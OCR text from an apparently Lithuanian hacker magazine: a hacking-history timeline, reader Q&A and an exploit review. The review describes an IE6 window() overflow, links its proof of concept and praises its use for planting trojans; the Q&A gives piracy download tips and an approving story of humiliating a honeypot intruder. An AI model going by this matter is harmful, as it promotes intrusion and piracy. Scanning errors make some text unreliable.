menį atliko Metju Broderikas. Filme pasakojama apie paauglį 
hakerį, kuris nulaužė karinę kompiuterių sistemą, ko rezultatu 
galėjo tapti trečiasis Pasaulinis Karas. Filmas daugeliui jaunų 
to laiko kompiuteristų tapo atradimu, kuris juos įkvėpė studi- 
juoti kompiuterių sistemas. 

[1983] Išleistas pirmasis shellas Korn shell (ksh). Jo autoriumi 
tapo telefonų kompanijos ATRT darbuotojas Deividas Kornas, 
[1984] Išeina specialus aktas, suteikiantis JAV Slaptajai tamy- 
bai įgaliojimus tirti kompiuterinius nusikaltimus. 

[1984] Hakeris slapyvardžiu Lex Luthor ikuria grupę Legion of 
Doom, kuri greitai tapo skaitlingiausia, labiausiai kvalifikuota ir 
įtakingiausia hakerių komanda pasaulyje. 

[1984] Išeina pirmasis spausdinto hakerių žurnalo 2600: The 
Hacker Ouarterly numeris, kurio pagrindiniu redaktoriumi tapo 
Erikas Korlėjus aka Emma- 
nuel Goldstein. 

[1984] Loboko mieste (Tek- 
sasas) gimsta nauja hake- 
rių grupė Cult of Dead Cow. 


su C parašyto 


Filmo „Hackers“ plakatas 


Jos Įkūrėjai buvo Swamp Ratte, Franken Gibe ir Sid Vicious, 
kurie buvo to paties pavadinimo BBS sistemos operatoriai. Iš 
pradžių garsi savo pogrindiniu žurnalu, tikrą šlovę CoDC pelnė 
išleidusi Back Orifice programą 1998 metais. 

[1984] Endriu Tanenbaumas sukuria pirmąją Minix versiją, kuri 
buvo už dyką platinamas UNIX klonas, vėliau įkvėpęs Linusą 
Torvaldsą sukurti Linux. 

[1985 kovo 15] Užregistruotas pirmasis domenas Symbo. 
lics.com 

[1985 lapkritis] Rendis Tišleris aka Taran King Ir Kreigas Ne- 
idorfas aka Knight Lightning išleidžia pirmąjį žurnalo Phrack nu- 
merį. Kuriamas kartu su daugeliu pogrindžio atstovų, elektroni- 
nis ir nemokamas žurnalas greitai tapo pačiu populiariausiu ha- 
Kerišku leidiniu. 

[1985] Išleidžiama Microsoft Windows 1.0, kuri buvo pardavi- 
nėjama po 100 dolerių. 

[1986 spalio 2] Išleidžiamas Computer Fraud and Abuse Act, 
kurį sukūrė JAV valdžia ir kuris oficialiai paskelbė, kad kompiu- 
teriniai įsilaužimai atsiduria už įstatymo ribų, bei apibrėžė baus- 
mes už tokio tipo nusikaltimus. 

[1986] Vienas pirmųjų kompiuterių virusų The Brain atakuoja 
sistemas su MS-DOS 

[1987] Italijoje išeina pirmasis krekerių žurnalo Decoder nu 
meris. 

[1987] Įkurta saugumo organizacija CERT (Computer Emergen- 
cy Response Team), kuri buvo skirta studijuoti ir spręsti kom- 
piuterių saugumo problemas. 

[1987] Žurnalo Phrack redaktoriai organizuoja uždarą pogrindi 
ni renginį SummerCon. kurį aplankė 20 žymiausių Amerikos ha- 
kerių. 

[1988] Pirmą kartą teisme panaudotas Computer Fraud and 
Abuse Act. Herbertui Zinui aka ShadowHawk buvo pareikšti kal- 
tinimai dėl ATėT ir JAV Gynybos ministerijos kompiuterių nulau- 
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žimo, dėl ko jam buvo skirta 10 tūkstančių dolerių bauda ir 9 
menesiai laisvės atėmimo. 

(1988 lapkritis] Kompiuterių kirmino epidemija paplinta AR- 
PAnet tinkle, dėl ko paralyžiuojamas 6 tūkstančių kompiute- 
rių darbas. Savo darbą pradėjęs iš Masačūsetso tyrimų ins- 
to laboratorijos, per vieną naktį jis užkrėtė visus pagrindi- 
nius tinklo mazgus. Siekiant neutralizuoti užkratą, Berklio ins- 
titute įvyko skubus kiečiausių šalies kompiuterių specialistų 
susirinkimas, kurie disasembliavo kodą. Paaiškėjo, kad kir- 
mino autorius buvo Robertas Morisas — 24 metų studen- 
tas, kuris programos kode padarė klaidą, dėl ko kirminas 
paplito žaibišku greičiu 

[1988] Dėl kompiuterio nulaužimo Pirmasis nacionalinis Čika- 
gos bankas netenka 70 milijonų dolerių. 

[1989] Džudas Miltonas St. Jude ir R.U. Sirius išleidžia pirmąjį 
žurnalo Mondo 2000 numerį. Šis žurnalas tapo vienu populia- 
siu 90-ujų techniniu leidiniu 


Robertas Morisas Mark Tahas 


[1989] Phiber Optik įkuria grupę Mas 
ters of Deception. kurios tikslas buvo 
tapti geriausia pasaulio hakerių grupe. 


Artimiausius kelerius metus Masters of 
Deception dėl šio titulo aktyviai kovojo 
su Legion of Doom — abi komandos 
atlieka daugybę akiplėšiškų įsilaužimų, 
taip bandydamos apspjauti viena kitą. 
1992 metais „didysis hakerių karas 
baigiasi daugelio MoD narių areštu 
[1989] Užfiksuotas pirmųjų stealth vi 
rusų atsiradimas 

[1989] Po arešto The Mentor sukuria 
„Hakerio manifest: Itis buvo Išpu 
likuotas žurnale Phrack It smarkiai Iš 
populiarėjo pogrindyje. 

[1990 sausis] Įvyko vokiečių hakerių teismas, kuriame Jie 
buvo kaltinti šnipinėjimu KGB. Karlas Koksas, Piteris Karlas, 
Markusas Hesas ir Dobas keletą mėnesių už pinigus aprūpi- 
no rusų žvalgybą informacija, gauta nulaužus vyriausybės ir 
komercines sistemas. Pagrindiniu liudininku teisme buvo vie 
nas iš komandos narių, hakeris Hansas Hiubneris aka Pen- 
g0. Už savanorišką prisipažinimą ir parodymus prieš likusiuo 
sius jis buvo amnestuotas. Likusieji buvo nuteisti lygtinai ir 
baudomis. 

[1990] Moteris, slapwvardžiu Natasha Grigori. paleidžia BBS, 
kuris tapo centrine programinės įrangos piratų bendravimo vie 
ta. Vėliau ji įkuria antichildporn.org — hakerių grupę, kuri seka 
vaikų pornografijos platintojus Ir duomenis apie juos išsiunčia 
teisėsaugos struktūroms. 

[1990] Suformuota Electronic Frontier Foundation 
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nimo kompiuteriniais nusikaltimais areštuotų žmonių teisių ap 
saugos organizacija. 
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[1990] Įvyko žurnalo Phrack redaktoriaus Kreigo Neidorfo teis- 
mas, nes jis išpublikavo dokumentą, kuriame buvo aprašomos 
911 tarnybos telefonų specifikacijos. Telefonų kompanija do- 
kumentą įvertino 80 tūkstančių dolerių, tačiau teisme pavyko 
įrodyti, kad šią tekstinę bylą bet kuris pageidaujantysis gali rasti 
valstijos bibliotekoje, o jos reali kaina neviršija 13 dolerių. Krei- 
gas buvo išteisintas. 

[1990 kovas] Buvo vykdoma operacija Sundevil — stambiau- 
sias istorijoje antihakeriškas reidas, apėmęs 13 miestų. Ope- 
racijoje veikė 150 specialiųjų tarnybų darbuotojų, kuriems pa- 
vyko konfiskuoti 42 kompiuterius, 23 tūkstančius diskelių, kal- 
hą spausdintos medžiagos ir kitų hakeriškų dalykėlių. Sulaikyti 
hakeriai mainais į amnestiją davė parodymus vienas prieš kitą, 
kas ne pačiu geriausiu būdu paveikė kažkada draugišką pogrin- 
dį. Po reido taip pat buvo uždaryta daug stambių hakeriškų BBS, 
iš scenos pasitraukė žymūs hakeriai. 

[1990] Kevinas Poulsenas kartu su Ronu Ostinu atliko savo 
žymiąją radijo aferą. Kai Los Andželo radijo stotis pranešė apie 
konkursą, kuriame 102-am prisiskambinusiajam pažadėjo pa- 
dovanoti 50 tūkstančių dolerių kainuojantį Porsche, hakeriai nu- 
laužė stoties telefonų tinklą ir užgrobė 25 telefonų linijų valdy- 
ma. Savaime suprantama, 102-uoju tapo Kevinas, kuris vėliau 
pasiėmė savo prizą, o dar vėliau buvo areštuotas. 

[1991] Išleista PGP (Pretty Good Privacy) — šifravimo progra- 
ma, kurią sukūrė Filipas Cimermanas. JAV vyriausybė autoriui 
pateikė kaltinimus dėl šifravimo programinės įrangos eksporta- 
vimo apribojimų pažeidimo, tačiau tai PGP nesutrukdė tapti vi- 
same pasaulyje populiariu duomenų apsaugos įrankiu. 
[1991] Išėjo pirmoji tekstinė UNIX sistemoms skirta naršyklė 
Lynx. 

[1991 rugpjūčio 6] Timas Berners-Ly pranešė apie darbų ties 
WWW pradžią. 

[1991 rugsėjo 17] Linus Torvalds pristatė pirmąją savo opera- 
cinės sistemos Linux versiją. 

[1992] Kompiuterinė bendruomenė susijaudinusi dėl „Da Vin- 
čio“ viruso paleidimo grėsmės, kuris 1992 metų kovo 6 diena 
turėtų užgriūti tūkstančius viso pasaulio kompiuterių. Tačiau kai 
atėjo ši lemtingoji data, jokio incidento neįvyko. 

[1992] Pasauliniuose kino teatrų ekranuose pasirodo filmas 
Sneakers, pasakojantis apie profesionalių hakerių grupę. 
[1993] Nacionalinė Saugumo Agentūra sukūrė SHA (Secure 
Hash Algorithm). 

[1993] Teksaso ARM universiteto profesorius gauna daugybę 
grasinimų mirtimi po to, kai jo vartotoją nulaužęs ir tuo pasi- 
naudojęs hakeris išsiuntinėja 20 tūkstančių rasistinių praneši- 
mų. 

[1993 balandžio 21] Nacionalinis programų kūrimo superkom- 
piuteriams centras išleidžia Moseic 1.0 pirmąją pasaulyje 
web naršyklę. Jos kūrėjai greitai taps kompanijos Netscape įkū- 
rėjais. 

[1993 liepos 9) Džefas Mosas suorganizuoja DefCon — kom- 
piuterių saugumo konferenciją, vykstančią Las Vegase. Rengi- 
nys buvo planuojamas kaip vienkartinis, tačiau pasirodė toks 
populiarus, kad įvyko jau kitais metais ir yra iki šiol organizuoja- 
mas kasmet. o 

[1993 liepos 17] Pasaulio šviesą išvysta pirmasis komercinis 
Linux distributyvas — Slackware. 

[1993 gruodis] Išleidžiama pirmoji FreeBSD operacinės siste- 
mos versija. 


[1994] Įkurta kompanija RedHat, kuri išleidžia viena populia- 
riausių to paties pavadinimo Linux distributyvų. 

[1994 sausio 12] Už daugkartinius kompiuterinius nusikalti- 
mus Markas Abenas aka Phiber Optik, buvęs Legion of Doom 
narys ir Masters of Deception įkūrėjas nuteisiamas metams 
laisvės atėmimo. Neilgai trukus po to žurnalas New York Maga 
zine hakerį įtraukia į miesto protingiausių žmonių šimtuka. 
[1994 balandžio 12] Vienoje naujienu grupių pasirodo rekla- 
minis dviejų advokatų pranešimas, kuriame jie reklamuoja savo 
paslaugas. Skaitytojai šį laišką pavadino spam — nuo to laiko 
šis žodelis tapo vienu iš labiausiai paplitusių kompiuterinių ter- 
minų. 

[1994] Hakeriai skverbiasi į internetą ir savo pogrindinių BBS 
turinį perkelia į pasaulinio voratinklio svetaines. 

[1994] Rusų hakeris Vladimiras Levinas nulaužia Citybank kom- 
piuterių sistemą ir į savo sąskaitas Suomijoje ir Izraelyje perve- 
da 10 milijonų dolerių. Banko darbuotojai greitai užšaldo šias 
sąskaitas, tačiau Levino bendrininkams pavyksta išgryninti 400 
tūkstančių. Skotland Jardo policija hakerį areštavo Londone, 
kur šis atvažiavo pasisvečiuoti. Priglaudusi jį pusantrų metų an- 
gliškame kalėjime, valdžia Vladimirą po to pristatė į San Fran- 
ciską, kur iš naujo teisė ir šį kartą nuteisė laisves atemimui 
amerikietiškame kalėjime. 

[1994 gruodžio 25] Kompiuterių ekspertas Cutomu Simomu: 
ra padeda policijai susekti Keviną Mitniką, kuris nulaužė jo kom- 
piuterį ir paliko pasityčiojantį pranešima. Teisme prieš Mitnika 
jam pateikiami kaltinimai dėl daugybės kompiuterių sistemų 
nulaužimo, komercinės programinės įrangos ir 20 tūkstančių 
kreditinių kortelių numerių vagysčių. Ši kartą hakeris gauna 5 
metus kalėjimo. 

[1995] Kino teatrų ekranuose pasirodo filmai „The Net 
klas) ir „Hackers“. 

[1995] JAV Gynybos ministerija praneša apie vien tik einamais 
metais užfiksuotus 250 tūkstančių hakerių atakų prieš jų kom- 
piuterius. 6596 šių atakų buvo sėkmingos. 

[1995] Grupė Phonemasters. vadovaujama buvusio LoD hake- 
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Linuo simbolis Defcon 


Anna Kournikova, kurios gar- 
bei buvo pavadintas Virusas 


Rčanias Stolmenas 


rio Mark Tabas, ATėT, „British Telecom“, GTE, „MCI WorldCom“, 
„Sprint“, „Southwestern Bell“ ir vyriausybinių kompiuterių siste- 
mų telefoniniuose tinkluose sukelia chaosą. Hakerių gauja ke- 
Ieią mėnesių telefono kompanijoms tampa tikru maru. Metų 
pabaigoje FTB pradeda klausytis grupės narių pokalbių ir areš- 
tuoja lyderį. Mark Tabas nuteisiamas 5 metams laisvės atėmi- 
mo. 
[1995 kovo 18] Internete pasirodo programa SATAN (Security 
Administrator Tool for Analyzing Networks). kurią parašo žymūs 
saugumo ekspertai Denas Farmeris ir Vycė Venema. Įrankis pla- 
nuojamas kaip adminų įrankis, skirtas išaiškinti savo tinklo pa- 
žeidžiamumus, tačiau juo iš karto apsiginkluoja hakeriai. Ginčai 
apie tokio tipo programų legalumą netyla iki šiol. 
[1995 gegužės 5] Krisas Lamprechtas aka Minor Threat tam- 
pa pirmuoju žmogumi, kuriam oficialiai uždraudžiama naudotis 
internetu. Hakeris teisiamas už daugelį kompiuterinių nusikalti- 
mu, įskaitant duomenų iš vidinio kompanijos „Bell“ tinklo va- 
ę ir pardavimą. Minor Threat taip pat žinomas kaip ToneLoc 
programos, skenuojančios telefoninius tinklus ir ieškančios 
modeminių signalų autorius. 
[1995 liepos 12] Tatu Julonenas security bendruomenei pri- 
stato SSH (Secure Shell) protokolą. 
[1995 rugpjūtis] „Microsoft“ išleidžia Windows 95, kurios mi- 
lijonas kopijų parduodama per pirmas keturias dienas. 
[1996] Hakerių grupė Brotherhood nulaužia Kanados radijo 
transliavimo kompaniją. 
[1997] Išleidžiama programa AOHell, kuri leidžia bet kam, net 
ir su hakeriavimu beveik nesusijusiems žmonėms, stambiausio 
Amerikos tiekėjo „America Online“ tinkluose sėti chaosą. Kele- 
1ą dienų tūkstančių AOL vartotojų elektroninio pašto dėžutės 
atakuojamos multimegabaitinėmis pašto bombomis, o vidiniai 
pokalbių serveriai nuolat floodinami. 
[1997] Penkiolikmetis hakeris Croatian nulaužia JAV Guamo 
karinės oro bazės kompiuterius. 
[1997] Hakeriams pavyksta pralaužti Windows NT apsaugą. 
(1997 sausio 28] Kompanija RSA Data Security saugumo ben- 
druomenei pasiūlo nulaužti savo naują 40 bitų kodą. Janas Gold- 
beržas, Kalifornijos Berklio universiteto absolventas, tam pa- 
naudojo klasterį iš 250 darbo stočių, kuris per valandą perren- 
ka daugiau nei 100 milijardų kombinacijų. Jam prireikė 3,5 
valandos, kad dešifruotų štai tokį pranešimą: „Būtent todėl rei- 
kia naudoti ilgesnį raktą“. 
[1997] Švedijoje suorganizuojamas naujas hakerių renginys Dre- 
ambhack, kuris iš karto labai išpopuliarėja. 
[1997 rugsėjis] Gimsta Slashdot -- centrinis resursas visiems, 
ką domina naujos technologijos. 
[1998] Yahoo.com svetainėje pasirodo 
pranešimas apie galimą loginės bombos 
gavimą po užėjimo į šią paieškos siste- 
mą. Bombą buvo grasinta susprogdinti, 
jeigu valdžia iki nurodyto laiko į laisvę ne- 
paleis Kėvino Mitniko, tačiau visi šie gra- 
sinimai buvo paprasčiausias blefas. 
[1998 vasaris] Internet Systems Con- 
sortium (ISC) pasiūlo padidinti DNS ser- 
verių saugumą ir naudoti DNSSEC. 
[1998] Protestuojant dėl Mitniko įkali- 
nimo buvo nulaužta oficiali laikraščio The 
Janas Johansenas aka DVD Jon New York Times svetainė. Hakeriai, ku- 


rie save vadino HFG (Hacking for girls), pažadėjo ties tuo neap- 
sistoti. 

[1998] Du kinų hakeriai nuteisiami sušaudyti už banko kom- 
piuterių nulaužimą ir 31 tūkstančių dolerių vagystę. 

[1998] Izraelio paauglys. žinomas pravarde The Analyzer, įsi- 
brauna į vidinį Pentagono tinklą. Policijai pavyko greitai jį surasti 
ir areštuoti. 

[1998] Hakerių grupė LOpht buvo pakviesta į Senatą, kur turėjo 
teikti konsultacijas kompiuterių saugumo klausimais. Hakeriai 
įtikino vyriausybę, jog jiems pakanka 30 minučių, kad nutrauktų 
vartotojų priėjimą prie interneto visoje Amerikoje. 

[1999 lapkritis] Penkiolikmetis norvegų hakeris Jonas Johan 
senas aka DVD Jon kartu su dviem draugais iš MoRE (Masters 
of Reverse Engineering) grupės išleidžia programą DeCSS, pa- 
šalinančią CSS (Content Scrambling System) apsaugą. kuri bu- 
vo licencinių DVD standartas. 

[1999] JAV prezidentas Džordžas Bušas pareiškia apie savo 
ketinimus vyriausybinių kompiuterių sistemų saugumo padidi- 
nimui išskirti 1,4 milijardo dolerių. 

[1999] Nežinomi hakeriai užgrobia britų karinio ryšio palydovo 
valdymą ir už jo valdymo grąžinimą reikalauja pinigų. 

[1999 gruodis] 29 metų programuotojas iš Niudžersio Deivi 
das Smitas pripažintas kaltu už viruso Melissa sukūrimą Ir iš- 
platinimą, kuris kovo mėnesį užkrėtė daugiau nei 100 tūkstan- 
čių kompiuterių ir padarė apie 80 milijonų dolerių nuostolių. 
Smitas tapo pirmuoju žmogumi istorijoje, kuris buvo nuteistas 
už kompiuterių viruso sukūrimą. Jam buvo skirta 20 mėnesių 
laisvės atėmimo. 

[2000 vasaris] Kanados hakeris MafiaBoy įvykdo stambaus 
masto DDOS ataką. kuri nutraukia keleto populiariausių inter- 
neto resursų darbą. Tarp aukų buvo stambiausia elektroninė 
parduotuvė Amazon, naujienų portalas CNN ir Yahoo! paieškos 
serveris. Šešiolikmetis hakeris buvo nuteistas 8 mėnesių baus- 
me, kurią turėjo praleisti vaikų pataisos centre. 

[2000] Protestuodami prieš agresiją Kašmyre ir Palestinoje, Pa- 
kistano aktwvistai defeisina Indijos ir Izraelio vyriausybėi priklau- 
sančias svetaines. 

[2000] Hakeriai įsilaužia į vidinį „Microsoft“ tinkla ir prieina prie 
paskutinės Windows versijos išeities tekstų. Po to, kai kodas 
buvo išpublikuotas internete, Amerikos laikraščiuose pasirodė 
antraštės: „Rusų mafija vagia WinME kodą“. 

[2000 gegužė] Virusas, pavadinimu LoveLetter (taip pavadin- 
tas dėl laiško antraštės „| Love You“), per keletą valandų pa- 
plinta visame internete, sėdamas chaosą ir daugiamilijoninius 
nuostolius. 

[2000 birželis] Startuoja žymaus saugumo eksperto Lenso Spit- 
znerio projektas Honeynet, kurio tikslas — padidinti viso inter- 
neto saugumą. 

[2000 liepa] SANS institutas pirmą kartą išleidžia 10 pagrindi- 
nių pažeidžiamumų, kuriuos hakeriai dažniausiai panaudoja sis- 
temoms nulaužti, sąrašą. Tokio sąrašo poreikis pasiteisina, po 
ko jis pradedamas Įeisti reguliariai, 

[2001] „Microsoft“ korporacija tampa naujo tipo DoS atakų, 
kurios nukreiptos prieš DNS, auka. Per dvi dienas pagrindinė 
kompanijos svetainė milijonams vartotojų tampa neprieinama. 
[2001 vasaris] Internete pasirodo virusas Anna Kournikova, ku- 
ris neva atsiunčia prisegtas žymiosios sportininkės nuotraukas. 
[2001 liepa] FTB areštuoja rusų programuotoją Dmitrijų Sklia- 
rovą, kuris atvažiavo į Defcon konferencija perskaityti paskaitos 
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apie Ebook elektroninio spausdintų knygų analogo ap- 
saugos lygį ir nulaužimo galimybes. Areštas pasaulinėje kom- 
piuterių bendruomenėje sukėlė pasipiktinimo audrą. Kvietimai 
palaikyti Dmitrijų ir boikotuoti Adobe, kuri šiuo atveju buvo kal- 
tintojas, produkciją buvo publikuojami daugelyje svetainių. Sklia- 
rovas tapo pirmuoju žmogumi, kurio byla buvo svarstoma DMCA 
(Digital Millennium Copyright Act) įstatymo rėmuose. 2001 metų 
gruodžio 13 teismas atsiėmė visus programuotojui pateiktus 
kaltinimus. 

[2001 rugpjūtis] Pirmasis polimorfinis virusas Code Red už- 
krečia dešimtis tūkstančių kompiuterių. 

[2001] Atsiranda naujas DDOS atakų tipas, kuris pingų genera- 
vimui panaudoja Kompiuterius-zombius. 

[2001 gruodis] Po kruopščiai suplanuotų FTB antihakeriškų 
reidų ant teisiamųjų suolo sėdasi pagrindiniai lyderiaujančių kre- 
Kerių ir warezo grupių (Drink or Die, Razor 911, EVIANCE, Ro 
gueWarriorz, TFL, WLW, RiSC) nariai. Tačiau pagrindinių veikėjų 
štas ir uždarymas kalėjime praktiškai niekaip neatsiliepia kre- 
kerių aktyvumui 

[2002 balandis] JAV karinės struktūros pradeda projektą Man- 
nheim. kurio tikslas yra padidinti karinių kompiuterių sistemų 
saugumą. 

[2002] FTB areštuoja hakerį, kuris nulaužė 92 JAV Gynybos 
ministerijos kompiuterių sistemas ir keletą privačių tinklų. Garį 
lakinoną aka SOLO apkaltina pagal 8 kompiuterinių nusikalti- 
mų straipsnius ir 900 tūkstančių dolerių nuostolių padarymu. 
Spauda Makinoną pavadina visų laikų hakeriu. 

[2002] Nežinomi hakeriai suorganizuoja DoS ataką, nukreiptą 
prieš 13 DNS root serverių, kurie yra centriniai tinklo srautą 
koordinuojantys interneto mazgai. Dėl lanksčios tinklo struktū 
ros vartotojai visame pasaulyje nepajautė susijungimo greičio 
sumažėjimo, tačiau pats faktas saugumo forumuose sukėlė dis- 
kusijas apie teorinę žalimybę sukelti viso globalaus tinklo sutri- 
kimus. 

[2003] SoBig, Slammer ir MSBlast virusai sukelia anksčiau ne- 
matytas epidemijas. Slammer tapo plitimo greičio rekordinin- 
Ku, vos per porą valandų užkrėtęs šimtus tūkstančių mašinų. 
Tai turėjo įtakos ne tik privačioms firmoms, bet ir aerouostams, 
kuriems teko atidėti reisus. 

[2003 ] Nežinomi hakeriai iš žaidimų gamintojo „Valve“ kom 
piuterių pavogė vieno labiausiai laukiamo žaidimo Half Life 2 
išeities tekstus ir išpublikavo juos internete. 
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Vladimiras Levi 


[2004] Amerikiečių 26 metų studentas Džatanas Deziras tam- 
pa pirmuoju žmogumi, kuris buvo patrauktas baudžiamojon at- 
sakomybėn pagal Fastlink programą. Programą JAV vyriausybė 
sukūrė siekdama ieškoti ir areštuoti nelegaliai programinę įran- 
ga platinančius piratus. 

[2004] Žinomų kompiuterinių virusų kiekis viršijo 100 tūkstančių. 
[2004 spalio 22] Paskelbtas nuosprendis žinomo rusų vi- 
rusų kūrėjo Whale byloje. Virusų autoriams Stepar ir Gast 
ropod, kurie buvo žinomos 29A grupės nariai, paskirta juo- 
kinga 3000 tūkstančių rublių (—300 litų) bauda. Toks švel- 
nus nuosprendis paaiškinamas tuo, jog nebuvo gauti nu- 
kentėjusiųjų pareiškimai. 

[2004] Įvyko pirmasis Amerikoje spamerių teismas. Džere- 
mis Džeinsas ir Džesika Degrut, brolis ir sesuo, AOL vartoto- 
jams siuntinėjo milijonus reklaminių pranešimų, siūlydami 
įsigyti programas greitam uždarbiui internete. Džeinsas buvo 
pasodintas į kalėjimą, o jo sesė atsipirko kelių tūkstančių 
dolerių bauda. 

[2004] Atsirado pirmasis kirminas, plintantis per Bluetooth pro- 
tokolą ir užkrečiantis mobiliuosius telefonus, kuriuose veikia Sym. 
bian OS. Cabir, kaip jį pavadino autorius, neturėjo kenksmingų 
funkcijų, tačiau dėl jo nuolatinių bandymų skenuoti aktyvius blu: 
etooth įrenginius kai kurie telefonai po užkrėtimo pradėjo veikti 
nestabiliai. 

[2004] 21 metų Brajenas Salcedo nuteisiamas ilgiausiam kom 
piuterinių nusikaltimų istorijoje laisvės atėmimo laikotarpiui. Jį 
teismas už kompiuterinės parduotuvės tinklo nulaužimą ir jo 
derbo sutrikdymą nuteisė 9 metams kaliūzės. Visa tai buvo pa- 
daryta eilinio wardrivingo seanso metu (ieškant neapsaugotų 
Wi-Fi tinklų). 

[2004] Pažangiausių viso pasaulio mokslinių centrų mokslinin 
kai pradėjo bendrą kompiuterių tinklo kūrimą. kurio „neimano. 
ma nulaužti“. Jis bus pagristas kvantine kriptografija. 


[2004 gruodis] Kinijoje paleistas naujos kartos internetas 
CERNET2 (China Education and Research Network 2), kurio 
pralaidumas siekia 2.5-10 Gb per sekundę ir kuris veikla 
IPv6 protokolu. Pirmaisiais mazgais tapo pirmaujantys šalies 
tyrimų institutai 


Corlbe-Vžiz8a 


Mobilusis virusas Cabir 


Janas Galdbergas 


Kevinas Poulsenas 


Visi žaislai vienoje vietoje 


+ 19 šalių 
+ per 1.000.000 skaitytojų 
+ viena aistra... 


Kaip būtų galima kiečiausiai pasityčioti iš į mano 
honeypot'ą patekusio niekšelio? 


Galiu papasakoti tikrą nutikimą, kurį Maskvoje iškrėtė 

mano bičiuliai. Palikę Radmin'ą be slaptažodžio (izo- 

liuotame, tačiau banko tinkle esančiame ir iš interneto 
prieinamame kompiuteryje), jie pradėjo laukti, žvejoti pik- 
tąjį hakerį. Ilgai laukti nereikėjo, antrą dieną prie sistemos 
prisijungė „skaitmeninis teroristas“. Kad sistema būtų tei 
singai „apiforminta“, My Documents buvo apsčiai prikrauta 
suklastotų buhalterinių ataskaitų knygų, sąskaitų išrašų ir 
atliktų tranzakcijų aprašymų. | labiausiai matomą vietą bu- 
vo padėta nuoroda į dokumentą su instrukcijomis pagei- 
daujamai sumai išgryninti. Ten buvo detaliai aprašyti visi 
žingsniai, įskaitant reikiamą autorizaciją, nurodymus ir slap- 
tažodžius. Jaunuolis pasirodė esąs iš tiesų drąsus ir jau 
antrą dieną pabandė gauti pinigėlius, skambindamas į biu- 
rą ir prisistatydamas „įgaliotuoju asmeniu“. Kad viskas at- 
rodytų įtikinamiau ir kad būtų sukurta Maskvoje veikiančio 
amerikietiško banko iliuzija, buvo paliktas Niujorko telefono 
numeris, iš kurio padarytas nukreipimas į vieną iš šį pokštą 
organizuojančių adminų mobilų. Šis pasiūlė jaunuoliui at- 
važiuoti į biurą, kur jo ilgai laukti nereikėjo. Jam apsireiš- 
kus, jis buvo nukreiptas į saugumo apžiūrą, motyvuojant 
„specialia finansinės įstaigos padėtimi“. Ten vargšelis buvo 
išrengtas iki pat apatinių, o po to jį nudžiugino žinia: „Jus 
filmuoja slapta kamera“. Jam taip pat buvo pasiūlyti du va- 
riantai: arba sų palikteis apatiniais kesauti į vasario šaltį, 
arba šiltai palaukti atvažiuojančios milicijos. Jaunuolis pa- 
sirinko pirmąjį variantą :). 


BŪK KONKRETUS IR UŽDAVINĖK 
KONKREČIUS KLAUSIMUS! PRIEŠ 
SIŲSDAMAS SAVO PROBLEMĄ | 
HACK-FAG, STENKIS JĄ KUO IŠSA- 
MIAU APRAŠYTI. TIK TUOMET Aš 
GALĖSIU IŠ TIESŲ TAU PADĖTI, 
ATSAKYTI BE! PARODYTI GALIMAS 
KLAIDAS. VENK BENDRINIŲ KLAU- 
SIMŲ, PANAŠIŲ Į „KAIP NULAUŽTI 
INTERNETĄ?“ — TU TIK APKRAUSI 
SAVO IR MANO PAŠTO DĖŽUTES. IŠ 
MANĘS GRĘŽTI KO NORS UŽ DYKĄ 
(INTERNETO, SHELLŲ IR PANAŠIAI) 
NEVERTA, NES AŠ PATS GYVENU IŠ 
HUMANITARINĖS PAGALBOS! 


Siunčiu wareza non stop režimu, bet p2p tinkluo- 
se nuolat susiduriu su visokiomis klastotėmis, 


kurios pateikiamos vietoje pageidaujamų grožy- 
bių! Kaip išvengti tokių dalykų? 


Pameni patarlę „neskubėk, ir būsi pirmas“? Čia ji labai 

aktuali. Prieš pradedant siųstis kokį nors daug užimantį 
dalykėlį (kas reikš dideles tinklo srauto ir laiko sąnaudas) 
protinga būtų patikrinti, ar toks filmas/albumas/programa 
jau išėjo, ar tik planuojamas išleisti? Troškimas gauti pa 
čius šviežiausius dalykus anksčiau už visus kitus dažnai bau- 
džiamas reklaminių pornofilmų įgrūdimu vietoje pageidau- 
jamo turinio. Neprotinga pykti ant tų stabdžių, kurie platina 
Windows Longhom Final Edition, kadangi tokio dalyko nėra 
net elitiniuose warezo archyvuose. Lygiai taip pat tu negau- 
si Matrix 5: Ejaculations ir Terminator 6. Be abejo, pasitai 
ko didelių nutekėjimų, kaip kad prieš metus nutiko su pa- 
vogtų Half Life 2, tačiau apie tai ir taip šaukė visi naujienų 
forumai. Būtent ten, pasiteiravus Google, galima patikrinti 
p2p gėrybių realistiškumą. 9096 atvejų galima pasitikėti ir 
vartotojų komentarais, kurie, išreikšdami gerą valią, infor 
muoja savo kolegas apie klastotes. Visai kas kita, jog dau- 
gelis vartotojų nepakankamai raštingi, kad galėtų įrašyti ko- 
mentarus anglų kalba. Tiesa, čia galima ir nesikankinti su 
vertimu, kadangi daugiau nei pusė neigiamų šaltinių (e 
Donkey tinkle jie raudoni) aiškiai parodys klastotę. 


EKSPLOITŲ APŽVALGA 


IE „WINDOW()“ ODAY EXPLOIT 


[aprašymas] „Korporacija „Microsoft“ 
vėl išsiskyrė savo produktų nestabilu- 
mu. Šį kartą viešuose šaltiniuose pa- 
sirodė Internet Explorer 6.0 naršyklei 
skirtas Oday eksploitas. Klaida aktuali 
visoms Win2k ir WinXP su visais patai- 
symų paketais. 

Klaidos esmė — paprasčiausias bufe- 
rio perpildymas (kokių dar klaidų gali 
būti MS produktuose? :)), kuris iškvie- 
čiamas per JavaScript kalbos funkciją 
window[). Eksploitas susideda iš 5 skir- 
tingų bylų. Pagrindinė HTML byla leidžia 
išsirinkti operacinę sistemą. Spustelėjus 
atitinkamą nuorodą tuojau pat bus pa- 
leistas skaičiuotuvas (calc.exe). Įverti- 
nus tai, kad kenksmingoje fillmem.htm 
byloje esantį shell kodą galima lengvai 
pakeisti, eksploitas priskiriamas kriti- 
niams :). 


[apsauga] Kaip jau įprasta, „Microsoft“ 
gana operatyviai sureagavo į šią klaidą 
ir išleido pažeidžiamoms sistemoms 
skirtą pataisymą. Pataisymų sąrašą ga- 
lima rasti www.computerterrorism.com 
svetainėje. 


[nuorodos] Visų HTML bylų išeities teks- 
tai yra čia: www.securitylab.ru/poc/extra/ 
242256.php. Apie techninę pažeidžiamu- 
mo realizaciją galima perskaityti adresu 
http://security.nnov.ru/Kdocu- 
ment294.html. Eksploitas paslėptas 
www.computerterrorism.com/research/ie/ 
poc.htm puslapyje. 


[blogio įvertinimas ir potencialas] Šį 
eksploitą naudos daugelis hakerių. Vi- 
sų pirma, su tokia priemone galima 
lengvai užkrauti kokį nors botą arba tro- 
janą, o antra, lengva iš priešo kompiu- 
terio parsisiųsti reikiamą informaciją, 
panaudojant standartinius socialinės in- 
